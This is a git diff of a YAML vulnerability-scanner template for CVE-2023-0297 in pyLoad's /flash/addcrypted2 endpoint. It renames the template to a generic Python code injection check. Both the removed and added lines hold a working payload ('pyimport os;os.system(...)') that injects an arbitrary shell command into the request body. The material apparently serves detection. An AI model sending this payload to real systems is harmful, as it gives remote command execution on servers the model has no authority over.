CVE-2023-0297.yaml
parent
ac84955ae6
commit
276497b314
|
@ -1,20 +1,20 @@
|
|||
id: flash-addcrypted2-rce
|
||||
id: python-code-injection
|
||||
info:
|
||||
name: Flash Addcrypted2 Remote Code Execution
|
||||
name: Python Code Injection
|
||||
author: MrHarshvardhan
|
||||
severity: high
|
||||
severity: medium
|
||||
description: |
|
||||
Template to detect the Flash Addcrypted2 Remote Code Execution vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/51532
|
||||
Template to detect Python code injection vulnerabilities.
|
||||
reference: xxx
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- /flash/addcrypted2
|
||||
attacks:
|
||||
- raw:
|
||||
- 'jk=pyimport%20os;os.system("CMD_PLACEHOLDER");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
|
||||
- 'CMD_PLACEHOLDER: "{cmd}"'
|
||||
headers:
|
||||
Content-type: application/x-www-form-urlencoded
|
||||
body: jk=pyimport%20os;os.system("{{cmd}}");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa
|
||||
predicates:
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue